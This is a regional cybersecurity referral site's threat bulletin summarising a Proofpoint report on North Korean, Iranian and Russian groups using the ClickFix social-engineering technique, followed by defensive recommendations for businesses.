icon

Digital safety starts here for both commercial and personal Use...

Defend Your Business Against the Latest WNY Cyber Threats We offer Safe, Secure and Affordable Solutions for your Business and Personal Networks and Devices.



WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deak daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do charge or collect any fees.

Buffalo, New York
United States

Current Threat Data

State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns

Summary:
Between late 2024 and early 2025, Proofpoint researchers observed a notable trend in which multiple state-sponsored threat actors, including groups from North Korea, Iran, and Russia began using the ClickFix social engineering technique, which was previously popular among cybercriminals. This technique, characterized by pop-up instructions prompting victims to manually run malicious PowerShell commands, was initially seen in early 2024 in campaigns by cybercrime actors like TA571. Since then, it has spread rapidly across the threat landscape, eventually catching the attention of state actors seeking novel infection methods.

Rather than transforming entire campaigns, state actors such as TA427 (North Korea), TA450 (Iran), and Russian-linked groups UNK_RemoteRogue and TA422 used ClickFix to replace traditional installation and execution stages within existing infection chains. TA427 used this technique in phishing campaigns targeting North Korea-focused researchers, directing victims to spoofed diplomatic meeting invitations that led to decoy PDFs and PowerShell commands, ultimately delivering QuasarRAT. Infrastructure supporting this operation relied on dynamic DNS services and compromised servers in South Korea, with tailored content in multiple languages to bolster the social engineering narrative.

TA450, an Iranian group also known as MuddyWater, employed ClickFix in a broader phishing campaign across the Middle East, impersonating Microsoft to trick recipients into running PowerShell commands that installed remote monitoring tools like Level. This marked a notable expansion beyond their typical Israeli targeting. Meanwhile, UNK_RemoteRogue, a suspected Russian group, used ClickFix in a campaign spoofing Microsoft Office to deliver malicious JavaScript and PowerShell, while TA422 (APT28) leveraged it in phishing emails posing as Google spreadsheets, which led users through reCAPTCHA gates to execute Metasploit payloads.


Security Officer Comments:
Despite the tactic's creative blend of deception and user interaction, Proofpoint noted that none of these actors continued to use ClickFix in sustained campaigns immediately afterward. Most returned to traditional methods, possibly indicating limited short-term success or that the technique is still being evaluated. However, TA427's renewed use of ClickFix in April 2025 suggests ongoing experimentation and potential refinements.

While China has not yet been observed using this technique, Proofpoint believes this may be due to limited visibility rather than a lack of interest, and it is likely that Chinese threat actors are also experimenting with ClickFix behind the scenes.


Suggested Corrections:

IOCs:
https://www.proofpoint.com/us/blog/...d-90-days-state-sponsored-actors-try-clickfix

  • User Awareness and Training: Train employees to recognize social engineering tactics, particularly pop-up prompts instructing them to run terminal or PowerShell commands. Emphasize that legitimate system instructions will never ask users to manually run commands from emails or websites.
  • Script Execution Restrictions: Configure Group Policy or endpoint security tools to restrict or disable PowerShell, VBScript, and batch script execution for non-administrative users, especially from web browsers or email clients.
  • Email and Web Filtering: Use email security gateways to block phishing emails and prevent delivery of messages with suspicious links or attachments. Implement URL filtering to block known malicious domains, especially those using dynamic DNS (DDNS) services.
  • Application Control and EDR: Deploy Endpoint Detection and Response (EDR) solutions with behavioral detection to monitor for unusual script activity, unauthorized PowerShell usage, and suspicious child processes spawned from office applications or browsers.
  • Restrict Outbound Connections and Monitor DNS: Limit outbound internet access from user workstations where possible, and monitor DNS traffic for requests to DDNS domains or suspicious infrastructure that could be associated with spoofed "secure drives" or malicious command-and-control servers.

Link(s):
https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html


https://www.proofpoint.com/us/blog/...d-90-days-state-sponsored-actors-try-clickfix

Contact Us for Threat Assistance
Back to Current Threats